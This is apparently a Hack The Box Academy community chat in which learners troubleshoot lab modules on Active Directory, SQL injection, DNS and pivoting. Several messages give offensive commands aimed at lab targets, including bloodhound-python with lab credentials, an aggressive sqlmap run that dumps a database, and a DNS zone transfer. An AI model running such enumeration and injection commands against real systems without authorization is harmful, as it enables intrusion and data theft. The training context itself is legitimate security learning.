Guys, I started this CTF thing today and I need help. I started my first CTF challenge, I spawned the ip target but nothing... there are no indications on what I should do, it only says "use cURL and set the flag" above there are very minimal examples where there is nothing useful . even doing "curl <ip port>/index.html" or curl -s -O <ip port>/index.html" does nothing. It says that the flag is in the "download.php" file but I don't know how get there due to lack of explanations. Help me thanks.

Does it show what exactly the trust relationship is?

this is my problem.

where?

On the lines between them?

i am not getting anything

this is from the section

Thank god, I thought you were using light mode lol

Lemme check my notes

okk !

im rerunning SharpHound

Yep, screenshot in my notes is from my own VM, mapped them just fine, for the record I was using bloodhound-python

wtf xD

i ran it with -c all

do you see the other domain if you search domain: ?

yes i do

then it didn't capture the trust properly, had that happen a few times

oh

let me try then

bwt what's this .bin file generated by SharpHound?

There's some data written to it that speeds up future runs, like if you're running bloodhound on a loop

it's a local cache, you can disable it with --memcache which will use ram as cache instead of a local file

thx

still cant map domain trusts :/

yeah I avoid using sharphound if I can, takes way too long and still need to transfer them out

yeah, I don't remember the last time I ran sharphound

But it should be catching the trusts

Yup

i used that

i have a pivot but i dont think this should be affecting xd

bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

that is my command

if you are just looking for the trusts try SharpHound v1.0.4 (got the same issue in offshore)

could it be the machine somehow? cause if I recall properly I ran bloodhound-python sometime at the beginning of the module and don't remember if I ever had it to run it again

the only thing i get is a lot of DNS queries fail with bh-python but i think thats normal

coz they actual lab has only 3 machines

try with --dns-timeout 30 --dns-tcp at the end of your command

once it starts querying computers it does get a lot of fails since they're not active like you said

i still cant map domain trusts xD

hello , i have a problem on blind sql injecion module. ,does anyone finish this module ?

but why people got it working?

i want to understand ...

https://github.com/BloodHoundAD/BloodHound/issues/614

I am stuck on time based sqli ( data extraction ) question ,
I have dump the database name , tables , and the columns but i am not able to dump the data

maybe?

wish I knew mate, bloodhound ingestors can get weird and miss things

u on the Domain Trusts Primer section? the SharpHound thing worked for me but i'll give that a check when i can if you still have this issue

fixed in 4.3.1

thank you

yes i am

im on 4.3.1 and it should be fixed

oh no that's an old version of SharpHound the new one never got the trusts for me

maybe the built in query is broken? try this

MATCH (obj1), (obj2) WHERE obj1.name = '<DOMAIN1>' AND obj2.name = '<DOMAIN2>' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p

im just confused about arth0s getting it with bloodhound-python lol

no luck

did you fill in the domain names

HAHAHA

no.

at this point im upset

you could try on one of the earlier machines in the module, who knows

MATCH (obj1), (obj2) WHERE obj1.name = 'INLANEFREIGHT.LOCAL' AND obj2.name = 'FREIGHTLOGISTICS.LOCAL' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p

no luck

nothing showed?

nope

welp means it didn't get the trust at all then

what method did you use

bloodhound-python from the SSH instance?

or you pivoted

pivot with ligolo-ng

me 2

weirdo.

i installed it with pipx

found the problem

https://github.com/dirkjanm/BloodHound.py/issues/136 i think

In Shells & Payloads, the skill assessment, were we supposed to be able to get the creds without the hints in the scenario? If so, how?

got the trusts thing to work for y'all?

i am studying this module right now

working with BH 4.3.0 with any ingestion method

4.3.1 no luck...

can i DM you?

have you solved the time based extraction ?

Sure

nice, tried it on the pwnbox (bloodhound version 4.2.0) and it's worked just fine

yea the changes came in 4.3.1

for 4.3.1 u need SH 2.0.1

so the issue was bloodhound it self? 4.2.0 on the pwnbox worked for me with multiple scan methods

yes it is

do you want a tldr?

🤷‍♂️ if it works, it works but testing a bunch of stuff just show me that the only version of SharpHound that doesn't get the trust is SharpHound v1.1.0 and the v2.x just doesn't want to work for some reason

for 2.0.1 you need BH 4.3.1

bloodhound-python only works for BH >= 4.2 and <=4.3.0

oh i mean it doesn't want to run on the target for some reason (ldap errors)

unless you change trusts.py

yea, as a lot of people say if u can do it remotely from Linux just do it xD

what was the other common compatibility error?

im getting notes on all this BH stuff

This version of BloodHound.py is only compatible with BloodHound 4.2 or newer. For the 3.x range, use version 1.1.1 via pypi. As of version 1.3, BloodHound.py only supports Python 3, Python 2 is no longer tested and may break in the future.

oh this was

Hello guys

good afternoon

Have someone done advanced sql injection course

had you done advanced sql injection course

staright ahead I did:
|| sqlmap -u 'http://<IP>:<PORT>/*.php' --data='{"id":1}' --no-cast --random-agent --tamper=between --level=5 --risk=3 --schema ||
then:
||-D production -T final_flag ||
but I couldn't C the table content !!!!

after what U said I did:
||--dbs ||
got 2: || information_schema || & || production ||

then I did:
|| -D information_schema --tables || & || -D production --tables ||
got || final_fqag || did:
||-D production -T final_fqag || that did not exist but when I did again || production -T final_flag || got the table content

now I'm confuse ...
what I did at the start was good (had problem with the internet or a HTB bug) or did I needed to do the DB enumeration to get some sort of permission??

is it time based? xd

me?

yes

I think it did asked me about it ...
but how that make a difference?

time based sometimes miss some character

well it didn't give me the whole content of the table ...

and I saw somewhere here that it happened to some other players ...

but when it went "by the order of enumeration" it show me the content ...
so I don't understand what was the wrong thing here

guys but my FAQ publicated in #1024429874246590575 was eliminated....

why?

i did, no luck

try rdate -n $DCIP

The last option is to prepend commands with faketime -f +7h or whatever the clock skew is

Only thing I can think of is if you were spoiling an active machine

I'm currently working on the Windows Priv Esc module, in the credential hunting section. The first question asks me to find a file with a password in it, I've found three different files with passwords in them. What appears to be the most obvious answer is a txt file in the htb-student documents directory. It doesn't appear to be the answer to the question. Is the question incorrect or do I keep looking for more possibilities?

thanks bro, it worked 🥰

Great!

What would be a good alternative to "evil-winrm"?

Writing your own

I'm "cleaning" and adding planes a,b and c for each tool in my toolboxes. That's the reason for the question 🙂

I'm serious, there is no alternative

^

can anyone help here?

its on the box keep searching

the module has everything you need for it

guys i need help with POST JSON

who can help me?

"["London (UK) "]curl: (3) bad range in URL position 2:
[London (UK)]
∆

heloo guys on lifi module section of prvention second question Edit the php.ini file to block system()

do i need to disable the system function

? iv been stuck here the whole day

Hello guys

Did you know jjava

did someone know java

got it guys thank you

Java is a beautiful island located between Sumatra and Bali

When it comes to the programming language, try it in #programming

if you have no access, then read and follow #welcome

I've gone over every line in the module twice and dont know where else to look, do you have any hints as to a direction

do you want to dm me the findstr command you are using

I love this response

I drank Java today - dark roast specifically.

The fact that they don't allow more than one public class in a file turns off my mind 💔

java...

va…

Why is everyone here dissing Java de Hutt

It's (not) just a meme

What's the first steps i should take if i wanna learn hacking?

hey facing the same issue already turned of realtime protection still no luck

fix= start cmd as admin 🙂

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Nobody here is dissing Java. We like the island and the coffee

there is more than one user that can log in with smb. Make sure you have the right user. The name of the detected share will be a clue.

hey guys anyone already finished the RDP and SOCKS Tunneling with SocksOverRDP module i set everything up last step is it to rdp into 172.16.6.155 from the piviot host but this is what i get

For Active Subdomain Enumeration I am working on the second problem where it states to Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I believe I was able to find the answer with the command ||dig any axfr “inlanefreight.htb” @<target ip>|| during when I finally got the results I saw these that looked weird and assuming they were the zones I submitted them and it turned out to be right. I wanted to confirm if these were indeed the correct zones and if there are any other way to look for these.

|| ww02.inlanefreight.htb||
|| www1.inlanefreight.htb ||

Use either any or axfr. Both together make no sense.
Both "zones" are not correct as far as I remember

actually no, ||inlanefreight.htb|| is the one zone here and there is also a subdomain with its own records you need to do zone transfer on all the found subdomains to find the other zone

I used both because for some reason using them separately wasn’t giving me anything.

did you add domain and name server to the hosts file? if not do it and then try again

I did and when trying to run the command with just any or with -type axfr separate I was getting zone transfer fails

can you share a screenshot

The entry in the Hosts file only makes sense if you want to use the fqdn instead of the IP

True, the module teaches it that way so i just assumed, he followed the module

oh nvm, he was using ip

fixxed it by deleting the domain in the command

Hello for this I don't succeed to recover hash ntlmv2 why?

Are you running powershell as admin?

No, I thinked to have a admin password

Thanks

Hello, I'm doing the Attacking Common Services: Attacking DNS and foe the life of me can't figure out how to get the records. I've got all the subdomains but keep getting errors with dig and fierce

Is anyone able to help?

which one do you got

everyone 🫠

Unsure if you're still stuck, but I just got to SA and am (seemingly) in same position as you... And while the course did cover a (small) bit of file-uploads in the CSP bypasses, doesn't seem applicable in this case...

No worries, thank you, I’ll keep looking

@hidden trellis @fossil crescent DMing you.

How did you get it when I used the proxychains Firefox-est 172.x.x.x after setting everything up and it times out.

hello. is the academy's avatar changeable ?